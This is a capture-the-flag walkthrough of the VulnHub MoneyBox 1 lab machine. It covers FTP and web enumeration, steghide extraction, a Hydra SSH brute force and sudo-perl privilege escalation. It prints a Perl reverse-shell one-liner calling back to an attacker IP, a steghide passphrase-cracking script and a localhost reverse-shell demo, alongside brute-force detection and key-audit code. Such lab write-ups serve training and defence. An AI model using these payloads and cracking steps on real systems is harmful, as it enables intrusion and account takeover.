Capture the flag (CTF)

MoneyBox 1: VulnHub CTF walkthrough

July 1, 2021 by LetsPen Test

This VulnHub capture the flag (CTF) is an easy-level challenge. The goal is to gain root on the machine and read three flag files. The download link is given in the Sources section at the end of this article.

The machine can be downloaded from VulnHub and run in VirtualBox. A torrent download is also offered on the VulnHub entry page linked in the Sources section.

Please note: for all these machines I have used Oracle VirtualBox to run the downloaded VM, with Kali Linux as the attacker machine. The techniques shown are for educational purposes only, and I am not responsible if they are used against any other targets.


The steps

  • Getting the IP address with the Netdiscover utility
  • Port scanning with Nmap
  • Enumerating the web application
  • Enumerating the FTP service
  • Installing Steghide and extracting a hidden message from an image file
  • Brute-forcing the SSH service
  • Getting root and reading the flags

Now that we have the plan, let's get started with the challenge.

The walkthrough

Step 1

The first step, as always, is to run Netdiscover to identify the target machine's IP address. Netdiscover sends ARP probes on the local network and lists every host that answers, which gives us the IP addresses of all running machines, as shown in the screenshot below.

Command used: << netdiscover >>

In the highlighted area of the above screenshot, we can see our target machine's IP address. The target machine IP address is 192.168.1.21, and I will be using 192.168.1.25 as the attacker IP address (the same two addresses are used in all commands that follow).

Note: The target machine IP address may be different in your case, as it is being assigned by the network DHCP.

Step 2

The second step is to run a port scan to identify the open ports and services on the target machine. We use Nmap, which is accurate and installed on Kali Linux by default. The highlighted area of the following screenshot shows the Nmap command we ran and the open ports it identified.

Command used: << nmap 192.168.1.21 -p- -sV >>

As we can see above, three ports are open on the target machine. In the command, "-p-" scans all 65,535 TCP ports instead of Nmap's default top 1,000, and "-sV" probes each open port to identify the service and its version. Nmap identified ports 21, 22 and 80 as open, running FTP, SSH and HTTP respectively.

Step 3

Let us start with the HTTP port by opening the target machine's IP address in the browser.

As we can see above, there is a simple home page that says "welcome to Moneybox CTF." There is not much to explore on this page, so we ran a Dirb scan to identify other directories and files on the server. Dirb requests a list of commonly used file and directory names from the target web server and reports the ones that do not come back as 404. The result of the Dirb scan can be seen below.

Command used: << dirb http://192.168.1.21 >>

In the above screenshot, we can see that the website has a folder named ‘blogs,’ so let’s open this on the browser and explore further.

The page showed a hint message in the browser: it mentions a previous hacker who successfully compromised the machine and wants to leave a clue.

We checked the page source and found a useful hint, shown in the following screenshot.

In an HTML comment, we found the name of another hidden directory. Let us open it in the browser.

As can be seen above, it shows only a line of plain text, so we again checked the page source, which can be seen below.

Found secret key: 3xtr4ctd4t4

In the comments, we found a secret key, but we have nowhere to use it yet, so we noted it for later. We also ran a Dirb scan on the secret directory to look for further clues. The result can be seen in the following screenshot.

Command used: << dirb http://192.168.1.21/S3cr3t-T3xt/ >>

The Dirb scan turned up nothing further. Having explored all the hints on the HTTP port, we move on to enumerating the FTP service in the next step.

Step 4

The port scan also showed FTP open, so let's try to connect to the FTP service with a default account. The most common one is the "anonymous" account, which we used to log in as follows:

Command used: << ftp 192.168.1.21 >>

  • Username: anonymous
  • Password: anonymous

The login succeeded, so anonymous FTP access is enabled on the target. After logging in, we listed the current directory with the "ls" command and found an image file. Its size looked quite large for a simple picture, so we downloaded it for further analysis. The download can be seen below.

Command used: << get trytofind.jpg >>

With the image downloaded to the attacker machine, let's open it in the browser.

We could not find any clue in the image itself, so we decided to analyze it further. The tool for this is "steghide", a steganography program that embeds data in JPEG, BMP, WAV and AU files and extracts it again when given the right passphrase. An unusually large JPEG is a hint, not proof, that something is embedded; Steghide tells us for certain. It is not preinstalled on Kali Linux, so in the next step we install it and run it against the image.

Step 5

The official website of the Steghide tool can be seen below (the URL is in the Sources section).

With this tool we can check whether any hidden information is embedded in the image file. It is not preinstalled on Kali Linux, so we install it from the Kali repository.

Command used: << apt-get install steghide -y >>

Here, we have installed the tool on our attacker machine with "apt-get". Let us now use it to extract data from the image file. This can be seen below.

Command used: << steghide --extract -sf trytofind.jpg >>

As we can see, the embedded data is protected with a passphrase, which must be entered to extract it. We identified a secret key in one of the previous steps, so let us try it here and see if it works.

Password: 3xtr4ctd4t4

The secret key worked and the command succeeded. Steghide extracted the hidden data and saved it as "data.txt". Let us open the file with the "cat" command, as shown in the following screenshot.

Command used: << cat data.txt >>

We found another hint hidden in the image file. It says that there is another user named "renu" on the target machine who uses a very weak password. So, let us run a brute-force attack against the SSH service for the username "renu".
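Here the passphrase came straight from an HTML comment. When no such hint exists, the usual fallback is to try candidate passphrases against the file non-interactively. The Python wrapper below is an added example, not part of the original walkthrough or of the Steghide project: it shells out to the steghide binary (which must be installed), supplies each candidate with "-p" so steghide never prompts, and treats exit status 0 as a successful extraction. The image and wordlist names are assumptions.

```python
import itertools
import subprocess
from typing import Iterable, Iterator, List, Optional


def steghide_argv(image: str, passphrase: str) -> List[str]:
    """Argument vector for one non-interactive extraction attempt.

    -sf names the stego file, -p supplies the passphrase so steghide does not prompt,
    -f overwrites an output file left behind by an earlier run instead of asking.
    """
    return ["steghide", "extract", "-sf", image, "-p", passphrase, "-f"]


def build_candidates(hints: Iterable[str], wordlist_lines: Iterable[str]) -> Iterator[str]:
    """Yield hints gathered during enumeration first, then wordlist entries.

    Blank entries and duplicates are skipped while preserving order, so a key found in a
    page comment is tried before the first line of rockyou.txt.
    """
    seen = set()
    stripped = (line.rstrip("\r\n") for line in wordlist_lines)
    for pw in itertools.chain(hints, stripped):
        if pw and pw not in seen:
            seen.add(pw)
            yield pw


def try_passphrase(image: str, passphrase: str) -> bool:
    """True when steghide exits 0, i.e. the passphrase decrypted and extracted the payload.

    A wrong passphrase makes steghide exit non-zero with 'could not extract any data
    with that passphrase!' on stderr; that output is captured, not shown.
    """
    try:
        proc = subprocess.run(steghide_argv(image, passphrase),
                              capture_output=True, text=True)
    except FileNotFoundError:
        raise SystemExit("steghide is not installed (apt-get install steghide)")
    return proc.returncode == 0


def crack(image: str, wordlist_path: str, hints: Iterable[str] = ()) -> Optional[str]:
    """Return the first passphrase that extracts data from `image`, or None if none works."""
    with open(wordlist_path, encoding="latin-1", errors="ignore") as fh:
        for pw in build_candidates(hints, fh):
            if try_passphrase(image, pw):
                return pw
    return None


if __name__ == "__main__":
    # Assumed file names; the hint is the key the walkthrough found in the page source.
    found = crack("trytofind.jpg", "/usr/share/wordlists/rockyou.txt", hints=["3xtr4ctd4t4"])
    print("passphrase:", found)
```

Each attempt forks a new steghide process, so a full rockyou.txt run takes hours; that is why hints from enumeration go first and why a genuinely random passphrase is out of reach this way.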

Step 6

For this step we used "hydra", a popular network login brute-forcing tool that is installed on Kali Linux by default. The command and the results of the attack can be seen in the following screenshot.

Command used:

<< hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.21 ssh >>

  • Username: renu
  • Password: 987654321

Hydra found a valid password for the user "renu", an all-numeric string. With this second set of credentials, we log in to the target machine over SSH as user "renu". This can be seen below:

Command used: << ssh renu@192.168.1.21 >>

We are successfully logged into the target machine as user "renu." So, in the next step we will try to get the root access.
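Hydra works by trying one password after another over fresh SSH sessions, so from the target's point of view the attack is a burst of failed logins for one user from one source, followed by a success. The script below is an added example (not from the original article) of the detection a SOC would run over the sshd entries in /var/log/auth.log: it groups failures by source address, flags any source over a threshold, and records whether a password login from that source was accepted afterwards, which separates a completed brute force from background noise. The log lines are constructed for the example using the page's renu/192.168.1.25 pairing, and the threshold value is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample of sshd lines in /var/log/auth.log (not taken from the MoneyBox VM).
# Lines 1-5 are the trace Hydra leaves: rapid failures, then an accepted password.
# Lines 6-7 are a legitimate user mistyping once and then logging in with a key.
SAMPLE_AUTH_LOG = """\
Jul  1 10:15:01 moneybox sshd[1201]: Failed password for renu from 192.168.1.25 port 51002 ssh2
Jul  1 10:15:01 moneybox sshd[1203]: Failed password for renu from 192.168.1.25 port 51004 ssh2
Jul  1 10:15:02 moneybox sshd[1205]: Failed password for renu from 192.168.1.25 port 51006 ssh2
Jul  1 10:15:02 moneybox sshd[1207]: Failed password for invalid user admin from 192.168.1.25 port 51008 ssh2
Jul  1 10:15:03 moneybox sshd[1209]: Accepted password for renu from 192.168.1.25 port 51010 ssh2
Jul  1 10:20:44 moneybox sshd[1300]: Failed password for lily from 192.168.1.40 port 40001 ssh2
Jul  1 10:21:10 moneybox sshd[1302]: Accepted publickey for lily from 192.168.1.40 port 40002 ssh2
"""

# sshd writes "invalid user" when the account does not exist; the optional group absorbs it.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+ ssh2")
ACCEPTED = re.compile(r"Accepted (password|publickey) for (\S+) from (\S+) port \d+ ssh2")


def detect_bruteforce(log_text, threshold=3):
    """Return one finding per source IP that produced at least `threshold` failed logins.

    Each finding lists the usernames tried and the users for which a *password* login from
    the same source was accepted after the failures. A public-key success is not counted as
    a compromise because a brute force of passwords cannot produce it.
    """
    failures = defaultdict(list)        # ip -> usernames seen in failed attempts
    accepted_after = defaultdict(set)   # ip -> users accepted by password after failures
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip].append(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            method, user, ip = m.groups()
            if method == "password" and failures.get(ip):
                accepted_after[ip].add(user)

    findings = []
    for ip, users in failures.items():
        if len(users) >= threshold:
            findings.append({
                "source": ip,
                "failures": len(users),
                "users": sorted(set(users)),
                "compromised": sorted(accepted_after[ip]),
            })
    return sorted(findings, key=lambda f: -f["failures"])


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(finding)
```

In production the same logic would run over a rolling time window rather than a whole file, and the threshold of three is deliberately low; Hydra against rockyou.txt produces thousands of these lines in minutes, which is also why the "-t" task count matters on a real engagement where stealth is a concern.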

Step 7

Until now, we only got user access on our target machine. Now, let us explore further weaknesses and clues to get to the root of the target machine.

Command used:

  • << id >>
  • << cat /etc/issue >>
  • << uname -a >>

We gathered some information about the target machine to identify the running operating system and kernel version, then searched the web for public exploits for these versions, but none were useful here. So, we explored the target machine manually for further hints or flags.

Command used: << cat user1.txt >>

We found our first flag, "user1.txt", in the current directory. The flag can be seen below. We kept exploring other directories and found a second user flag named "user2.txt", shown in the following screenshot.

Command used: << cat /home/lily/user2.txt >>

So far, we have found two user flags on the target machine. While exploring the files in various directories, we found an SSH authorized_keys file in lily's home directory. This can be seen below.

Command used: << cat authorized_keys >>

An authorized_keys file lists the public keys that are allowed to log in as that user, here "lily". Because the SSH login from renu's session below succeeds without a password, renu's own key pair must be among the keys listed, so we can switch to user "lily" by connecting to the SSH service on the target itself. This can be seen in the following screenshot.

Command used: << ssh lily@127.0.0.1 >>

The login was successful, and we are now logged into the target machine as user "lily." So, let us enumerate further to gain root access.
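The lateral move above works because lily's authorized_keys trusts a key that renu holds. Checking that relationship explicitly, rather than just trying "ssh lily@127.0.0.1", is how you audit which accounts can hop into which: compute the SHA256 fingerprint of every authorized key (the same value "ssh-keygen -lf" prints) and compare it with the public keys found in other users' home directories. The Python below is an added example, not code from the article; the key material is constructed (syntactically valid ssh-ed25519 lines that cannot actually authenticate) and the file contents, paths and comments are assumptions.

```python
import base64
import hashlib

# Prefixes of OpenSSH key-type tokens; the base64 key blob is the token that follows.
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ssh-dss", "ecdsa-sha2-", "sk-")


def _constructed_ed25519_pub(seed: bytes) -> str:
    """Make a syntactically valid ssh-ed25519 public-key string for the sample data.

    Constructed for this example only: the 32 "key" bytes are a SHA-256 digest of the
    seed, not a real key pair, so the line parses and fingerprints correctly but can
    never authenticate. The wire format is: uint32 len + "ssh-ed25519", uint32 len + key.
    """
    key = hashlib.sha256(seed).digest()
    blob = (len(b"ssh-ed25519").to_bytes(4, "big") + b"ssh-ed25519"
            + len(key).to_bytes(4, "big") + key)
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


# Constructed sample files (assumed names): what /home/renu/.ssh/id_ed25519.pub and
# /home/lily/.ssh/authorized_keys might contain. The second authorized line carries a
# "from=" option, as authorized_keys entries often do.
RENU_PUBKEY = _constructed_ed25519_pub(b"renu-key") + " renu@moneybox"
ROOT_PUBKEY = _constructed_ed25519_pub(b"root-key") + " root@moneybox"
LILY_AUTHORIZED_KEYS = "\n".join([
    "# keys permitted to log in as lily",
    _constructed_ed25519_pub(b"lily-laptop") + " lily@laptop",
    'from="127.0.0.1" ' + _constructed_ed25519_pub(b"renu-key") + " renu@moneybox",
    "",
])


def fingerprint(pubkey_line: str) -> str:
    """SHA256 fingerprint of one public-key line, in the form `ssh-keygen -lf` prints.

    Leading authorized_keys options (from=, command=, ...) and the trailing comment are
    ignored because only the key blob is hashed. Options containing whitespace inside
    quotes are not handled by the simple whitespace split used here.
    """
    tokens = pubkey_line.split()
    for i, tok in enumerate(tokens):
        if tok.startswith(KEY_TYPES) and i + 1 < len(tokens):
            blob = base64.b64decode(tokens[i + 1])
            digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
            return "SHA256:" + digest
    raise ValueError("no public key in line: %r" % pubkey_line)


def authorized_fingerprints(authorized_keys_text: str) -> set:
    """Fingerprints of every key in an authorized_keys file; blank and comment lines skipped."""
    fps = set()
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            fps.add(fingerprint(line))
    return fps


def who_can_login_as(authorized_keys_text: str, candidate_pubkeys: dict) -> dict:
    """Map each candidate owner to True if that owner's public key is accepted by the account."""
    allowed = authorized_fingerprints(authorized_keys_text)
    return {owner: fingerprint(pub) in allowed for owner, pub in candidate_pubkeys.items()}


if __name__ == "__main__":
    print(who_can_login_as(LILY_AUTHORIZED_KEYS, {"renu": RENU_PUBKEY, "root": ROOT_PUBKEY}))
```

On a real host the candidate keys would be collected from every readable *.pub and from the public half of any private key found lying around (including keys in backups and web roots), and the same comparison run against every authorized_keys, root's included.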

Command used: << sudo -l >>

We checked the current user's sudo rights with "sudo -l" and found that lily can run the "perl" command as root. Since perl can spawn arbitrary processes, any payload, including a shell, can be executed as root through it. So, let's craft a reverse shell that connects back to our attacker machine and run it through sudo on the target:

sudo perl -e 'use Socket;$i="192.168.1.25";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

The payload above connects from the target to the attacker machine at 192.168.1.25 on port 1234, duplicates the connected socket onto the shell's standard input, output and error, and executes "/bin/sh -i" over it. Because it is launched via sudo, the resulting shell runs as root (a plain local shell spawned through sudo and perl would give root just as well; the reverse shell is a convenience).

Before executing the payload on the target, start a netcat listener on the attacker machine to receive the incoming connection on port 1234. Then run the payload on the target, as shown below.

Command used: << nc -lvp 1234 >>

In the above screenshot, we can see that after a short wait the listener received the connection and we have root access to the target machine. Now let us read the root flag and complete the challenge.
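To make clear what the Perl one-liner actually does, the following Python, added here and not part of the original walkthrough, runs both ends of the reverse shell on 127.0.0.1: a listener thread plays the part of "nc -lvp 1234", and the victim side connects back and hands the socket to /bin/sh as its stdin, stdout and stderr, which is exactly the file-descriptor duplication the Perl payload performs before exec. The port is chosen by the OS rather than 1234, the shell runs as the current user (on the VM it was launched via sudo, which is what made it root), and "-i" is dropped so that no prompt text is mixed into the captured output. Linux/Unix only.

```python
import socket
import subprocess
import threading


def _attacker_side(server: socket.socket, collected: list) -> None:
    """What `nc -lvp 1234` does: accept one connection, send a command line, collect output."""
    conn, _peer = server.accept()
    with conn:
        conn.sendall(b"echo reverse-shell-ok; exit\n")
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:          # EOF once the remote shell exits and its socket copies close
                break
            chunks.append(data)
    collected.append(b"".join(chunks).decode().strip())


def reverse_shell_demo(host: str = "127.0.0.1") -> str:
    """Run both ends of a reverse shell on localhost and return what the listener received.

    The victim side mirrors the Perl payload: connect to host:port, then start /bin/sh with
    stdin, stdout and stderr all pointing at the socket (Perl's open(STDIN,">&S") and
    friends followed by exec). subprocess performs the dup2() calls in the child for us.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, 0))            # port 0: let the OS pick a free port (the page uses 1234)
    server.listen(1)
    port = server.getsockname()[1]
    collected = []
    listener = threading.Thread(target=_attacker_side, args=(server, collected))
    listener.start()

    victim = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    victim.connect((host, port))
    fd = victim.fileno()
    # The shell reads commands from the socket and writes results back to it; nothing is
    # attached to the victim's own terminal, which is why this works from a one-liner.
    subprocess.run(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd, check=False)
    victim.close()                    # drop our copy; the child's copies closed when it exited
    listener.join()
    server.close()
    return collected[0] if collected else ""


if __name__ == "__main__":
    print(reverse_shell_demo())
```

The only thing separating this demo from the real payload is the process's identity: run under sudo, the same three descriptors are handed to a root shell, which is the entire privilege escalation.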

Command used: << cat .root.txt >>


The root flag was easily found in the current directory (note the leading dot: ".root.txt" is a hidden file, so it only shows up with "ls -a"). With all three flags read, the challenge is complete.


Sources:

Steghide, SourceForge: http://steghide.sourceforge.net/

MoneyBox: 1, VulnHub: https://www.vulnhub.com/entry/moneybox-1,653/
